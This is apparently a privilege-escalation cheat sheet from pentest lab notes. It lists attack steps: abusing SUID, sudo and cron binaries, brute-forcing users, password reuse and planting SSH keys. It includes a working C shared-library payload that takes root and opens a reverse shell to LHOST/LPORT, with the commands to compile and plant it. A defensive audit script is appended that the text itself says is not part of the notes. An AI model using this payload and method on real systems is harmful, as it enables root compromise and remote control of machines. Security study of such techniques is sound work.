- Writable `/etc/shadow`
- Writable `/etc/passwd`
- Check the user's history
- Check the user's `env`
- Check the user's `.bashrc`
- SUID bit
- `sudo -l`
    - GTFOBins
    - Try to read the binary (maybe it is a `.sh` script)
    - Run the binary as `sudo <binary-full-path>`
- Cron job
    - The binary may be missing a library; if its search directory is writable we can create and write it (HINT)
- Get the usernames from `/home` and start brute-forcing those users
- If you come from the web, check `config.php`
- Look for services like `mysql`
- Look for internal ports
- Password reuse (get passwords from different resources like the DB and config files and reuse them)
- Username and password the same, like `patrick:patrick`
- Create a key pair with the `ssh-keygen` command, then rename the `id_rsa.pub` file to `authorized_keys` and add this file
- Check the user's groups:
    - if it is the `fail2ban` group: fail2ban PrivEsc (PG-Practice Fail)
    - if it is the `filter` group: filter PrivEsc: `find / -group filter 2>/dev/null`
    - if it is the `docker` group: docker PrivEsc
    - if it is
- Service: `find /etc -type f -writable 2> /dev/null`
  https://al1z4deh.medium.com/proving-grounds-hetemit-8469d0a3f189
- Check available commands: `echo $PATH`
- [ ] `find / -group filter 2>/dev/null`
- You find a binary file that may be run by the root user (SUID, sudo or cron job)
    - Try to run it
    - If it fails with a missing-library error like "cannot open shared object file":
        - Check the library path in `LD_LIBRARY_PATH`, for example in `/etc/crontab`
        - Find writable directories: `find / -type d -writable 2>/dev/null`
        - Match the writable directories against that PATH
        - Write a malicious .c file
```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setgid/setuid */

/* _init runs when the shared object is loaded (the original had a typo, _inti). */
void _init() {
    setgid(0);
    setuid(0);
    system("bash -i >& /dev/tcp/LHOST/LPORT 0>&1");
}
```
- Compile it: `gcc -shared -fPIC -nostartfiles exploit.c -o exploit.so`
- Put it in the target place
- Run the binary
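As an added defender-side check (not part of these notes), the script below audits a host for the preconditions the checklist above relies on: writable `/etc/shadow`, `/etc/passwd` and `/etc/crontab`, membership in groups like `docker`, and root-run binaries that cannot resolve a library while a directory on their search path is writable. The function names and the `ldd`-based check are my own assumptions, not tooling from the page.

```shell
#!/bin/sh
# Added audit helpers (not from the original notes). Assumes POSIX sh and
# coreutils; `ldd` is needed only by audit_binary.

# Print every directory in a colon-separated list that the current user can
# write to. A writable entry on PATH or LD_LIBRARY_PATH lets a user plant a
# binary or library that root-run jobs will load.
writable_dirs_in() {
  printf '%s\n' "$1" | tr ':' '\n' | while read -r d; do
    if [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ]; then printf '%s\n' "$d"; fi
  done
}

# Given ldd output, print the shared objects it reports as "not found".
missing_libs_from_ldd() {
  printf '%s\n' "$1" | awk '/=> not found/ { print $1 }'
}

# Count how many of the given paths the current user can write to (for
# /etc/shadow, /etc/passwd and /etc/crontab the answer should be 0).
count_writable() {
  n=0
  for f in "$@"; do
    if [ -w "$f" ]; then n=$((n + 1)); fi
  done
  echo "$n"
}

# Return 0 if the current user belongs to the named group (docker, disk, ...).
in_group() {
  for g in $(id -Gn); do
    if [ "$g" = "$1" ]; then return 0; fi
  done
  return 1
}

# Audit one root-run binary (SUID, sudo rule or cron job): flag libraries it
# cannot resolve together with writable directories on its search path.
audit_binary() {
  bin=$1
  search=${2:-$LD_LIBRARY_PATH:$PATH}
  missing=$(missing_libs_from_ldd "$(ldd "$bin" 2>/dev/null)")
  if [ -z "$missing" ]; then echo "ok: $bin resolves all libraries"; return 0; fi
  echo "WARNING: $bin cannot resolve: $missing"
  w=$(writable_dirs_in "$search")
  if [ -n "$w" ]; then echo "WARNING: writable search directories: $w"; fi
  return 1
}
count_writable /etc/shadow /etc/passwd /etc/crontab
```

A non-zero count from the last line, or any WARNING from `audit_binary` on a cron or SUID binary, is a finding to fix (correct the file mode, remove the writable search directory, or install the missing library).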